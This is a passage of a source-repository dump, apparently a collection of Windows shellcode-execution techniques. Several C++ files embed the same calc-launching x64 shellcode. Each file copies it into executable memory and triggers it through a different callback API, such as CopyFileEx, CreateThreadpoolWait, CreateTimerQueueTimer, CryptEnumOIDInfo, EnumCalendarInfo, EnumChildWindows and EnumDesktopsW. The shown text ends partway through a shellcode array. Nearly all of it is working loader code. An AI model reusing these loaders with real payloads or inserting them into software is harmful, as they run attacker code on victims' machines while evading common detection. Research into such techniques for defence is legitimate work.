| 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/CopyFileEx/CopyFileEx.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // alfarom256 calc shellcode 5 | unsigned char op[] = 6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 7 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 8 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 9 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 10 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 11 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 12 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 13 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 14 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 15 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 16 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 17 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 18 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 19 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 20 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 21 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 22 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 23 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 24 | "\x63\x2e\x65\x78\x65\x00"; 25 | 26 | 27 | 28 | int main() { 29 | 30 | 31 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 32 | ::RtlMoveMemory(addr, op, sizeof(op)); 33 | 34 | ::DeleteFileW(L"C:\\Windows\\Temp\\backup.log"); 35 | ::CopyFileExW(L"C:\\Windows\\DirectX.log", L"C:\\Windows\\Temp\\backup.log", (LPPROGRESS_ROUTINE)addr, NULL, FALSE, COPY_FILE_FAIL_IF_EXISTS); 36 | 37 | } -------------------------------------------------------------------------------- /Shellcode Execution/CopyFileEx/CopyFileEx.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/CreateThreadPoolWait/CreateThreadPoolWait.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // This technique was developed by alfarom256 please check out his awesome work! 6 | 7 | #define LEN 277 8 | 9 | // run calc 10 | unsigned char op[] = 11 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 12 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 13 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 14 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 15 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 16 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 17 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 18 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 19 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 20 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 21 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 22 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 23 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 24 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 25 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 26 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 27 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 28 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 29 | "\x63\x2e\x65\x78\x65\x00"; 30 | 31 | 32 | int main() 33 | { 34 | HANDLE hEvent; 35 | hEvent = CreateEvent(NULL, FALSE, FALSE, NULL); 36 | 37 | 38 | 39 | /* 40 | Can just shove a payload in RX mem and cast it to PTP_WAIT_CALLBACK 41 | ¯\_(ツ)_/¯ 42 | */ 43 | 44 | LPVOID addr = VirtualAlloc(NULL, LEN, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 45 | RtlMoveMemory(addr, op, LEN); 46 | DWORD old; 47 | 48 | 49 | if (!VirtualProtect(addr, LEN, PAGE_EXECUTE_READ, &old)) 50 | printf("%d", GetLastError()); 51 | 52 | PTP_WAIT ptp_w = CreateThreadpoolWait((PTP_WAIT_CALLBACK)addr, NULL, NULL); 53 | 54 | 55 | SetThreadpoolWait(ptp_w, hEvent, 0); 56 | 57 | // need to send events so the Threadpool Wait Callback has a chance to "catch" them and run 58 | SetEvent(hEvent); 59 | WaitForThreadpoolWaitCallbacks(ptp_w, FALSE); 60 | SetEvent(hEvent); 61 | while (TRUE) 62 | { 63 | Sleep(9000); 64 | } 65 | 66 | 67 | } -------------------------------------------------------------------------------- /Shellcode Execution/CreateThreadPoolWait/CreateThreadPoolWait.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/CreateTimerQueueTimer_Tech/CreateTimerQueueTimer_Tech.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | // alfarom256 calc shellcode 6 | unsigned char op[] = 7 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 8 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 9 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 10 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 11 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 12 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 13 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 14 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 15 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 16 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 17 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 18 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 19 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 20 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 21 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 22 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 23 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 24 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 25 | "\x63\x2e\x65\x78\x65\x00"; 26 | 27 | 28 | 29 | int main() { 30 | 31 | 32 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 33 | ::RtlMoveMemory(addr, op, sizeof(op)); 34 | 35 | 36 | 37 | HANDLE timer; 38 | HANDLE queue = ::CreateTimerQueue(); 39 | HANDLE gDoneEvent = ::CreateEvent(NULL, TRUE, FALSE, NULL); 40 | if (!::CreateTimerQueueTimer(&timer, queue, (WAITORTIMERCALLBACK)addr, NULL, 100, 0, 0)) { 41 | 42 | printf("Fail"); 43 | } 44 | 45 | if (::WaitForSingleObject(gDoneEvent, INFINITE) != WAIT_OBJECT_0) 46 | printf("WaitForSingleObject failed (%d)\n", GetLastError()); 47 | } -------------------------------------------------------------------------------- /Shellcode Execution/CreateTimerQueueTimer_Tech/CreateTimerQueueTimer_Tech.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/CryptEnumOIDInfo/CryptEnumOIDInfo.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #pragma comment(lib, "Crypt32.lib") 6 | 7 | // alfarom256 calc shellcode 8 | unsigned char op[] = 9 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 10 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 11 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 12 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 13 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 14 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 15 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 16 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 17 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 18 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 19 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 20 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 21 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 22 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 23 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 24 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 25 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 26 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 27 | "\x63\x2e\x65\x78\x65\x00"; 28 | 29 | 30 | 31 | 32 | int main() { 33 | 34 | 35 | LPVOID address = VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 36 | memcpy(address, &op[0], sizeof(op)); 37 | 38 | 39 | CryptEnumOIDInfo(NULL, NULL, NULL, (PFN_CRYPT_ENUM_OID_INFO)address); 40 | 41 | 42 | return 0; 43 | 44 | } -------------------------------------------------------------------------------- /Shellcode Execution/CryptEnumOIDInfo/CryptEnumOIDInfo.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumCalendarInfo/EnumCalendarInfo.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | // alfarom256 calc shellcode 4 | unsigned char op[] = 5 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 6 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 7 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 8 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 9 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 10 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 11 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 12 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 13 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 14 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 15 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 16 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 17 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 18 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 19 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 20 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 21 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 22 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 23 | "\x63\x2e\x65\x78\x65\x00"; 24 | 25 | 26 | int main() { 27 | LPVOID addr = ::VirtualAlloc(nullptr, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 28 | ::RtlMoveMemory(addr, op, sizeof(op)); 29 | ::EnumCalendarInfo((CALINFO_ENUMPROC)addr, LOCALE_USER_DEFAULT, ENUM_ALL_CALENDARS, CAL_SMONTHNAME1); 30 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumCalendarInfoEx/EnumCalendarInfoEx.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | // alfarom256 calc shellcode 4 | unsigned char op[] = 5 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 6 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 7 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 8 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 9 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 10 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 11 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 12 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 13 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 14 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 15 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 16 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 17 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 18 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 19 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 20 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 21 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 22 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 23 | "\x63\x2e\x65\x78\x65\x00"; 24 | 25 | 26 | int main() { 27 | LPVOID addr = ::VirtualAlloc(nullptr, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 28 | ::RtlMoveMemory(addr, op, sizeof(op)); 29 | ::EnumCalendarInfoEx((CALINFO_ENUMPROCEX)addr, LOCALE_USER_DEFAULT, ENUM_ALL_CALENDARS, CAL_SMONTHNAME1); 30 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumChildWindows/EnumChildWindows.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | 6 | int err(const char* errmsg) { 7 | 8 | 9 | printf("Error: %s (%u)\n", errmsg, ::GetLastError()); 10 | return 1; 11 | 12 | } 13 | // alfarom256 calc shellcode 14 | unsigned char op[] = 15 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 16 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 17 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 18 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 19 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 20 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 21 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 22 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 23 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 24 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 25 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 26 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 27 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 28 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 29 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 30 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 31 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 32 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 33 | "\x63\x2e\x65\x78\x65\x00"; 34 | 35 | 36 | 37 | int main() { 38 | 39 | 40 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 41 | ::RtlMoveMemory(addr, op, sizeof(op)); 42 | 43 | ::EnumChildWindows(NULL, (WNDENUMPROC)addr, NULL); 44 | 45 | 46 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumChildWindows/EnumChildWindows.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumDesktopW/EnumDesktopW.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | 6 | int err(const char* errmsg) { 7 | 8 | 9 | printf("Error: %s (%u)\n", errmsg, ::GetLastError()); 10 | return 1; 11 | 12 | } 13 | 14 | // alfarom256 calc shellcode 15 | unsigned char op[] = 16 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 17 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 18 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 19 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 20 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 21 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 22 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 23 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 24 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 25 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 26 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 27 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 28 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 29 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 30 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 31 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 32 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 33 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 34 | "\x63\x2e\x65\x78\x65\x00"; 35 | 36 | 37 | 38 | int main() { 39 | 40 | 41 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 42 | ::RtlMoveMemory(addr, op, sizeof(op)); 43 | 44 | ::EnumDesktopsW(GetProcessWindowStation(), (DESKTOPENUMPROCW)addr, NULL); 45 | 46 | Sleep(10000); 47 | printf("success"); 48 | 49 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumDesktopW/EnumDesktopW.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumDesktopWindows/EnumDesktopWindows.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | int err(const char* errmsg) { 6 | 7 | 8 | printf("Error: %s (%u)\n", errmsg, ::GetLastError()); 9 | return 1; 10 | 11 | } 12 | 13 | // alfarom256 calc shellcode 14 | unsigned char op[] = 15 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 16 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 17 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 18 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 19 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 20 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 21 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 22 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 23 | 